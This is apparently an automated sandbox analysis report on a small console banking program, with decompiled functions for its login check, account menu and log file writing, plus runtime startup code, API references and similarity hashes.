				_t49 = E00D8BFB3() & 0x0000ffff;
				E00D8FB9B(2);
				_t53 =  *0xd80000 - 0x5a4d; // 0x5a4d
				if(_t53 == 0) {
					_t17 =  *0xd8003c; // 0xf0
					__eflags =  *((intOrPtr*)(_t17 + 0xd80000)) - 0x4550;
					if( *((intOrPtr*)(_t17 + 0xd80000)) != 0x4550) {
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(_t17 + 0xd80018)) - 0x10b;
						if( *((intOrPtr*)(_t17 + 0xd80018)) != 0x10b) {
							goto L2;
						} else {
							_t38 = 0;
							__eflags =  *((intOrPtr*)(_t17 + 0xd80074)) - 0xe;
							if( *((intOrPtr*)(_t17 + 0xd80074)) > 0xe) {
								__eflags =  *(_t17 + 0xd800e8);
								_t6 =  *(_t17 + 0xd800e8) != 0;
								__eflags = _t6;
								_t38 = 0 | _t6;
							}
						}
					}
				} else {
					L2:
					_t38 = 0;
				}
				 *(_t51 - 0x1c) = _t38;
				if(E00D8CFF8() == 0) {
					E00D88995(0x1c);
				}
				if(E00D8D672(_t38, _t47) == 0) {
					_t19 = E00D88995(0x10);
				}
				E00D8BDBF(_t19);
				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
				E00D8A563();
				 *0xda4080 = GetCommandLineA(); // executed
				_t23 = E00D8FC82(); // executed
				 *0xda2284 = _t23;
				_t24 = E00D8F88D();
				_t56 = _t24;
				if(_t24 < 0) {
					E00D874BF(_t38, _t46, _t47, _t49, _t56, 8);
				}
				_t25 = E00D8FABA(_t38, _t46, _t47, _t49);
				_t57 = _t25;
				if(_t25 < 0) {
					E00D874BF(_t38, _t46, _t47, _t49, _t57, 9);
				}
				_t26 = E00D874F9(_t47, _t49, 1);
				_pop(_t40);
				_t58 = _t26;
				if(_t26 != 0) {
					E00D874BF(_t38, _t46, _t47, _t49, _t58, _t26);
					_pop(_t40);
				}
				_t28 = E00D81000(_t40, _t47, _t49, _t58, _t60, 0xd80000, 0, E00D8FD0D(), _t49); // executed
				_t50 = _t28;
				 *((intOrPtr*)(_t51 - 0x24)) = _t28;
				if(_t38 == 0) {
					E00D87751(_t50);
				}
				E00D874EA();
				 *(_t51 - 4) = 0xfffffffe;
				return E00D89145(_t50);
			}
















                                              0x00d88847
                                              0x00d88847
                                              0x00d88847
                                              0x00d88847
                                              0x00d88851
                                              0x00d88853
                                              0x00d88858
                                              0x00d88862
                                              0x00d88867
                                              0x00d88872
                                              0x00d88879
                                              0x00d8887f
                                              0x00d88884
                                              0x00d8888e
                                              0x00000000
                                              0x00d88890
                                              0x00d88895
                                              0x00d8889c
                                              0x00000000
                                              0x00d8889e
                                              0x00d8889e
                                              0x00d888a0
                                              0x00d888a7
                                              0x00d888a9
                                              0x00d888af
                                              0x00d888af
                                              0x00d888af
                                              0x00d888af
                                              0x00d888a7
                                              0x00d8889c
                                              0x00d8887b
                                              0x00d8887b
                                              0x00d8887b
                                              0x00d8887b
                                              0x00d888b2
                                              0x00d888bc
                                              0x00d888c0
                                              0x00d888c5
                                              0x00d888cd
                                              0x00d888d1
                                              0x00d888d6
                                              0x00d888d7
                                              0x00d888dc
                                              0x00d888e0
                                              0x00d888eb
                                              0x00d888f0
                                              0x00d888f5
                                              0x00d888fa
                                              0x00d888ff
                                              0x00d88901
                                              0x00d88905
                                              0x00d8890a
                                              0x00d8890b
                                              0x00d88910
                                              0x00d88912
                                              0x00d88916
                                              0x00d8891b
                                              0x00d8891e
                                              0x00d88923
                                              0x00d88924
                                              0x00d88926
                                              0x00d88929
                                              0x00d8892e
                                              0x00d8892e
                                              0x00d8893d
                                              0x00d88942
                                              0x00d88944
                                              0x00d88949
                                              0x00d8894c
                                              0x00d8894c
                                              0x00d88951
                                              0x00d88986
                                              0x00d88994

                                              APIs
                                              • ___security_init_cookie.LIBCMT ref: 00D88847
                                                • Part of subcall function 00D8BFB3: GetStartupInfoW.KERNEL32(?), ref: 00D8BFBD
                                              • _fast_error_exit.LIBCMT ref: 00D888C0
                                              • _fast_error_exit.LIBCMT ref: 00D888D1
                                              • __RTC_Initialize.LIBCMT ref: 00D888D7
                                              • __ioinit0.LIBCMT ref: 00D888E0
                                              • GetCommandLineA.KERNEL32(00D9D838,00000014), ref: 00D888E5
                                              • ___crtGetEnvironmentStringsA.LIBCMT ref: 00D888F0
                                              • __setargv.LIBCMT ref: 00D888FA
                                              • __setenvp.LIBCMT ref: 00D8890B
                                              • __cinit.LIBCMT ref: 00D8891E
                                              • __wincmdln.LIBCMT ref: 00D8892F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
                                              • String ID:
                                              • API String ID: 1504447550-0
                                              • Opcode ID: edece753fc02ba83ae6f49394f4dc0f9493aae36fa9d2c46f8117cf3db6395ad
                                              • Instruction ID: 98174e521d1b9063388cb62625ae492e90533887b8c6c0d43228cd806db17dda
                                              • Opcode Fuzzy Hash: edece753fc02ba83ae6f49394f4dc0f9493aae36fa9d2c46f8117cf3db6395ad
                                              • Instruction Fuzzy Hash: 4121F960A4430599EB607BB4AC47B3D3674DF00711FA9442AF648DA1D3DFB5C984BB72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 00D8C043, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00D8C043(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                              0x00d8c048
                                              0x00d8c058

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00D88ABA,?,?,?,00000000), ref: 00D8C048
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00D8C051
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: c9033cdbe2399a0ef2fb6898e2b575780b9fdc3904cbdddb4fbaa0340905692f
                                              • Instruction ID: 3537ad858ccf2c53c5072b3d358ed8d6f1cbceaa7c7b22a5f20fdc03b3a4bfb8
                                              • Opcode Fuzzy Hash: c9033cdbe2399a0ef2fb6898e2b575780b9fdc3904cbdddb4fbaa0340905692f
                                              • Instruction Fuzzy Hash: E3B09231144308EBCB002F91EC0AB587F28EB06A52F008012F60DC42719F725411AAB5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8D8C9, Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b60fde407b7840c338e97dc429a871aa8c345dd78a8c4aecf7914392091c0a54
                                              • Instruction ID: 6c1de6dabcea76323eeb7e4289d72c41417d7f0472830e4d37e5244d6704cab2
                                              • Opcode Fuzzy Hash: b60fde407b7840c338e97dc429a871aa8c345dd78a8c4aecf7914392091c0a54
                                              • Instruction Fuzzy Hash: D2320621D29F454DD723A638C822335A389AFB73D4F55D737F81AB5EA5EB29C4834210
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8C020, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00D8C020(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                                              0x00d8c02d

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00D8F72E,00D8F6E3,?,00000000,00000000,00000000,00000000), ref: 00D8C026
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 4933d67a70faa122e42eea93210bf8c139305522c27f1204eb11b55cdb266102
                                              • Instruction ID: 2b0ad50cd345488356154017c6e7753506631b6148ac5c5765c5045a9f613302
                                              • Opcode Fuzzy Hash: 4933d67a70faa122e42eea93210bf8c139305522c27f1204eb11b55cdb266102
                                              • Instruction Fuzzy Hash: D1A0113000030CAB8B002F82EC088883F2CEA02AA0B000022F80C802308B22A822AAA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 012FF575, Relevance: .0, Instructions: 26COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341443682.00000000012FD000.00000040.00000001.sdmp, Offset: 012FD000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 528a4f16991854913c462da7ad73e791a05de82d13dc41471258f931d0ebd2d2
                                              • Instruction ID: 1834ae65c991566ee830d5fbd8cbcd322cd022a4412eb2aab86cfb3b4f694d7a
                                              • Opcode Fuzzy Hash: 528a4f16991854913c462da7ad73e791a05de82d13dc41471258f931d0ebd2d2
                                              • Instruction Fuzzy Hash: 0FE01A36274605AFCB54DFA8DD85D65B3E8EB19320F1442A4FE19C73A0E634EE008A50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 012FF5B2, Relevance: .0, Instructions: 23COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341443682.00000000012FD000.00000040.00000001.sdmp, Offset: 012FD000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                              • Instruction ID: f93de945954b894d3737df3ee0663659b37ae24a30bcc5288ca35285017d0b2b
                                              • Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                              • Instruction Fuzzy Hash: 4DE04F332305159BC7229F5ADA44C96F7E8EB886B0F05443AEF4A97620D630FC10CA90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D869A0, Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00D869A0() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                              0x00d869b7

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                              • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                              • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                              • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 012FED06, Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341443682.00000000012FD000.00000040.00000001.sdmp, Offset: 012FD000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                              • Instruction ID: 49c205c7728011ba69bc273896f8bb34e34cdc69084839717bb33c6c5abd9bb8
                                              • Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                              • Instruction Fuzzy Hash: EBB092616254844AFB1383288415B02B6E4A740B01F8A84F4A10582CA6C25C89849100
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 012FF615, Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341443682.00000000012FD000.00000040.00000001.sdmp, Offset: 012FD000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                              • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                              • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                              • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 012FF75D, Relevance: .0, Instructions: 3COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341443682.00000000012FD000.00000040.00000001.sdmp, Offset: 012FD000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3f377ddc5f06dfc3153ea0c28b0a1464ef23ffe7e410e0425465c082cb6f6e04
                                              • Instruction ID: cb197d2559c09660318d3d12e6cb9f80cf1b08a2d0c32daa4285e7c7a95ab15a
                                              • Opcode Fuzzy Hash: 3f377ddc5f06dfc3153ea0c28b0a1464ef23ffe7e410e0425465c082cb6f6e04
                                              • Instruction Fuzzy Hash: ECA00179152A809BD7128B55D558B9476A4B748A44F9544A4D40546A51827C5504CE04
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D835B0, Relevance: 91.3, APIs: 27, Strings: 25, Instructions: 313COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E00D835B0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v36;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v68;
				char _v80;
				char _v92;
				char _v124;
				char _v156;
				void* __ebp;
				intOrPtr _t58;
				intOrPtr _t60;
				void* _t61;
				void* _t98;
				void* _t99;
				void* _t108;
				intOrPtr _t111;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t139;
				void* _t148;

				_t148 = __fp0;
				_t122 = __esi;
				_t121 = __edi;
				_t108 = __ebx;
				_v68 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v12 = 0;
				_v20 = 0;
				_v20 = 0;
				do {
					E00D81320(_t121, _t122, 0, 0xa, 8, 0x46, 0xf);
					E00D81250(7, 5);
					_push("Only THREE attempts shall be allowed to enter username and password.");
					E00D870FC(_t108, _t121, _t122, 0);
					E00D81250(0x17, 0xa);
					_push("Enter User name : ");
					E00D870FC(_t108, _t121, _t122, 0);
					E00D8732B("%s", 0xda2ee4);
					E00D81250(0x17, 0xc);
					_push("Password        : ");
					E00D870FC(_t108, _t121, _t122, 0);
					_t127 = _t123 + 0x14;
					E00D81290(_t121, _t122,  &_v68);
					_v20 = _v20 + 1;
					_t143 = _v20 - 3;
					if(_v20 == 3) {
						E00D82080( &_v68, _t121, _t122, _t143, _t148);
						E00D81250(0x19, 0xa);
						_push(0xd9fb98);
						E00D870FC(_t108, _t121, _t122, _t143);
						E00D81250(0x16, 0xc);
						_push("Press ENTER to exit the program...");
						E00D870FC(_t108, _t121, _t122, _t143);
						_t127 = _t127 + 8;
						E00D87751(0);
					}
					_v12 = 0;
					_t58 = E00D86E91("USER.DAT", "r");
					_t128 = _t127 + 8;
					 *0xda2f28 = _t58;
					while(1) {
						_push( &_v156);
						_push( &_v124);
						_t60 =  *0xda2f28; // 0x0
						_t61 = E00D86FC1(_t60, "%s %s %s\n",  &_v92);
						_t129 = _t128 + 0x14;
						if(_t61 == 0xffffffff) {
							break;
						}
						_t98 = E00D881D0(0xda2ee4,  &_v124);
						_t128 = _t129 + 8;
						if(_t98 == 0) {
							_t99 = E00D881D0(0xda2f02,  &_v156);
							_t128 = _t128 + 8;
							if(_t99 == 0) {
								_v12 = _v12 + 1;
							}
						}
					}
					_t111 =  *0xda2f28; // 0x0
					_push(_t111);
					E00D86D56(_t108, _t121, _t122, __eflags);
					_t130 = _t129 + 4;
					E00D82080(_t111, _t121, _t122, __eflags, _t148);
					__eflags = _v12;
					if(__eflags == 0) {
						goto L10;
					}
					break;
					L10:
					E00D81250(0xa, 0xa);
					_push(0xd9fbf8);
					E00D870FC(_t108, _t121, _t122, __eflags);
					_t123 = _t130 + 4;
					__eflags = 1;
				} while (1 != 0);
				E00D883B7(__eflags,  &_v80);
				_t131 = _t130 + 4;
				E00D83A50(_t108, _t121, _t122, _t148);
				do {
					E00D82080(_t111, _t121, _t122, __eflags, _t148);
					E00D81250(0xf, 8);
					_push("1. Create New Account\n");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0xf, 0xa);
					_push("2. Cash Deposit");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0xf, 0xc);
					_push("3. Cash Withdrawl");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0xf, 0xe);
					_push("4. Fund Transfer");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0xf, 0x10);
					_push("5. Account information");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0x2d, 8);
					_push("6. Transaction information");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0x2d, 0xa);
					_push("7. Log out");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0x2d, 0xc);
					_push("8. Exit");
					E00D870FC(_t108, _t121, _t122, __eflags);
					_t139 = _t131 + 0x20;
					E00D81250(1, 0x11);
					_v24 = 0;
					while(1) {
						__eflags = _v24 - 0x4e;
						if(__eflags >= 0) {
							break;
						}
						_push("_");
						E00D870FC(_t108, _t121, _t122, __eflags);
						_t139 = _t139 + 4;
						_t111 = _v24 + 1;
						__eflags = _t111;
						_v24 = _t111;
					}
					E00D81250(0x17, 0x13);
					_push("Press a choice between the range [1-8] ");
					E00D870FC(_t108, _t121, _t122, __eflags);
					_t131 = _t139 + 4;
					_v16 = 0x30;
					_v16 = _v16 - 1;
					__eflags = _v16 - 7;
					if(__eflags > 0) {
						E00D82080(_t111, _t121, _t122, __eflags, _t148);
						E00D81250(0xa, 0xa);
						_push("Your input is out of range! Enter a choice between 1 to 8!");
						E00D870FC(_t108, _t121, _t122, __eflags);
						E00D81250(0xf, 0xc);
						_push("Press any key to return to main menu...");
						E00D870FC(_t108, _t121, _t122, __eflags);
						_t131 = _t131 + 8;
					} else {
						switch( *((intOrPtr*)(_v16 * 4 +  &M00D83A28))) {
							case 0:
								E00D83D80(_t108, _t111, _t121, _t122, __eflags, _t148);
								goto L35;
							case 1:
								__eax = E00D845E0(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
								goto L35;
							case 2:
								__eax = E00D84980(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
								goto L35;
							case 3:
								__eax = E00D84E30(__ebx, __edi, __esi, __eflags, __fp0);
								goto L35;
							case 4:
								__eax = E00D855A0(__ebx, __ecx, __eflags, __fp0);
								goto L35;
							case 5:
								__eax = E00D86130(__ebx, __ecx, __edx, __fp0);
								goto L35;
							case 6:
								E00D82080(__ecx, __edi, __esi, __eflags, __fp0) = E00D81250(0xf, 0xa);
								_push("Are you sure you want to Log out? <Y/N> : ");
								__eax = E00D870FC(__ebx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								__ecx = _v5;
								__eflags = __ecx - 0x59;
								if(__eflags == 0) {
									L28:
									_t40 =  &_v36; // -15
									_t40 = E00D883B7(__eflags, _t40);
									 *0xda2f28 = E00D86E91("LOG.DAT", "a");
									_t41 =  &_v36; // -15
									__ecx = _t41;
									_push(_t41);
									_t42 =  &_v80; // -59
									__edx = _t42;
									_push(_t42);
									_push(0xda2f40);
									_push(0xda2ee0);
									_push("%s %s %s %s\n");
									__eax =  *0xda2f28; // 0x0
									_push(__eax);
									__eax = E00D86EA6(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 0x18;
									__ecx =  *0xda2f28; // 0x0
									_push(__ecx);
									__eax = E00D86D56(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 4;
									__eax = E00D835B0(__ebx, __edi, __esi, __fp0);
								} else {
									__edx = _v5;
									__eflags = _v5 - 0x79;
									if(__eflags == 0) {
										goto L28;
									}
								}
								goto L35;
							case 7:
								E00D82080(__ecx, __edi, __esi, __eflags, __fp0) = E00D81250(0xf, 0xa);
								_push("Are you sure you want to exit? <Y/N> : ");
								__eax = E00D870FC(__ebx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								__edx = _v5;
								__eflags = _v5 - 0x59;
								if(__eflags == 0) {
									L32:
									_t45 =  &_v36; // -15
									__ecx = _t45;
									__eax = E00D883B7(__eflags, _t45);
									 *0xda2f28 = E00D86E91("LOG.DAT", "a");
									_t46 =  &_v36; // -15
									__edx = _t46;
									_push(_t46);
									_t47 =  &_v80; // -59
									__eax = _t47;
									_push(_t47);
									_push(0xda2f40);
									_push(0xda2ee0);
									_push("%s %s %s %s\n");
									__ecx =  *0xda2f28; // 0x0
									_push(__ecx);
									__eax = E00D86EA6(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 0x18;
									__edx =  *0xda2f28; // 0x0
									_push(__edx);
									__eax = E00D86D56(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 4;
									__eax = E00D87751(0);
								} else {
									__eax = _v5;
									__eflags = _v5 - 0x79;
									if(__eflags == 0) {
										goto L32;
									}
								}
								goto L35;
						}
					}
					L35:
					__eflags = 1;
				} while (1 != 0);
				return 1;
			}








































                                              0x00d835b0
                                              0x00d835b0
                                              0x00d835b0
                                              0x00d835b0
                                              0x00d835b9
                                              0x00d835bf
                                              0x00d835c2
                                              0x00d835c5
                                              0x00d835c8
                                              0x00d835cb
                                              0x00d835ce
                                              0x00d835d1
                                              0x00d835d4
                                              0x00d835d7
                                              0x00d835de
                                              0x00d835e5
                                              0x00d835ec
                                              0x00d835f4
                                              0x00d835fd
                                              0x00d83602
                                              0x00d83607
                                              0x00d83613
                                              0x00d83618
                                              0x00d8361d
                                              0x00d8362f
                                              0x00d8363b
                                              0x00d83640
                                              0x00d83645
                                              0x00d8364a
                                              0x00d83651
                                              0x00d8365c
                                              0x00d8365f
                                              0x00d83663
                                              0x00d83665
                                              0x00d8366e
                                              0x00d83673
                                              0x00d83678
                                              0x00d83684
                                              0x00d83689
                                              0x00d8368e
                                              0x00d83693
                                              0x00d83698
                                              0x00d83698
                                              0x00d8369d
                                              0x00d836ae
                                              0x00d836b3
                                              0x00d836b6
                                              0x00d836bb
                                              0x00d836c1
                                              0x00d836c5
                                              0x00d836cf
                                              0x00d836d5
                                              0x00d836da
                                              0x00d836e0
                                              0x00000000
                                              0x00000000
                                              0x00d836eb
                                              0x00d836f0
                                              0x00d836f5
                                              0x00d83703
                                              0x00d83708
                                              0x00d8370d
                                              0x00d83715
                                              0x00d83715
                                              0x00d8370d
                                              0x00d83718
                                              0x00d8371a
                                              0x00d83720
                                              0x00d83721
                                              0x00d83726
                                              0x00d83729
                                              0x00d8372e
                                              0x00d83732
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d83734
                                              0x00d83738
                                              0x00d8373d
                                              0x00d83742
                                              0x00d83747
                                              0x00d83753
                                              0x00d83753
                                              0x00d8375f
                                              0x00d83764
                                              0x00d83767
                                              0x00d8376c
                                              0x00d8376c
                                              0x00d83775
                                              0x00d8377a
                                              0x00d8377f
                                              0x00d8378b
                                              0x00d83790
                                              0x00d83795
                                              0x00d837a1
                                              0x00d837a6
                                              0x00d837ab
                                              0x00d837b7
                                              0x00d837bc
                                              0x00d837c1
                                              0x00d837cd
                                              0x00d837d2
                                              0x00d837d7
                                              0x00d837e3
                                              0x00d837e8
                                              0x00d837ed
                                              0x00d837f9
                                              0x00d837fe
                                              0x00d83803
                                              0x00d8380f
                                              0x00d83814
                                              0x00d83819
                                              0x00d8381e
                                              0x00d83825
                                              0x00d8382a
                                              0x00d8383c
                                              0x00d8383c
                                              0x00d83840
                                              0x00000000
                                              0x00000000
                                              0x00d83842
                                              0x00d83847
                                              0x00d8384c
                                              0x00d83836
                                              0x00d83836
                                              0x00d83839
                                              0x00d83839
                                              0x00d83855
                                              0x00d8385a
                                              0x00d8385f
                                              0x00d83864
                                              0x00d83867
                                              0x00d83874
                                              0x00d83877
                                              0x00d8387b
                                              0x00d839e3
                                              0x00d839ec
                                              0x00d839f1
                                              0x00d839f6
                                              0x00d83a02
                                              0x00d83a07
                                              0x00d83a0c
                                              0x00d83a11
                                              0x00d83881
                                              0x00d83884
                                              0x00000000
                                              0x00d8388b
                                              0x00000000
                                              0x00000000
                                              0x00d83895
                                              0x00000000
                                              0x00000000
                                              0x00d8389f
                                              0x00000000
                                              0x00000000
                                              0x00d838a9
                                              0x00000000
                                              0x00000000
                                              0x00d838b3
                                              0x00000000
                                              0x00000000
                                              0x00d838bd
                                              0x00000000
                                              0x00000000
                                              0x00d838d0
                                              0x00d838d5
                                              0x00d838da
                                              0x00d838df
                                              0x00d838e2
                                              0x00d838e6
                                              0x00d838e9
                                              0x00d838f4
                                              0x00d838f4
                                              0x00d838f8
                                              0x00d83912
                                              0x00d83917
                                              0x00d83917
                                              0x00d8391a
                                              0x00d8391b
                                              0x00d8391b
                                              0x00d8391e
                                              0x00d8391f
                                              0x00d83924
                                              0x00d83929
                                              0x00d8392e
                                              0x00d83933
                                              0x00d83934
                                              0x00d83939
                                              0x00d8393c
                                              0x00d83942
                                              0x00d83943
                                              0x00d83948
                                              0x00d8394b
                                              0x00d838eb
                                              0x00d838eb
                                              0x00d838ef
                                              0x00d838f2
                                              0x00000000
                                              0x00000000
                                              0x00d838f2
                                              0x00000000
                                              0x00000000
                                              0x00d8395e
                                              0x00d83963
                                              0x00d83968
                                              0x00d8396d
                                              0x00d83970
                                              0x00d83974
                                              0x00d83977
                                              0x00d83982
                                              0x00d83982
                                              0x00d83982
                                              0x00d83986
                                              0x00d839a0
                                              0x00d839a5
                                              0x00d839a5
                                              0x00d839a8
                                              0x00d839a9
                                              0x00d839a9
                                              0x00d839ac
                                              0x00d839ad
                                              0x00d839b2
                                              0x00d839b7
                                              0x00d839bc
                                              0x00d839c2
                                              0x00d839c3
                                              0x00d839c8
                                              0x00d839cb
                                              0x00d839d1
                                              0x00d839d2
                                              0x00d839d7
                                              0x00d839dc
                                              0x00d83979
                                              0x00d83979
                                              0x00d8397d
                                              0x00d83980
                                              0x00000000
                                              0x00000000
                                              0x00d83980
                                              0x00000000
                                              0x00000000
                                              0x00d83884
                                              0x00d83a14
                                              0x00d83a19
                                              0x00d83a19
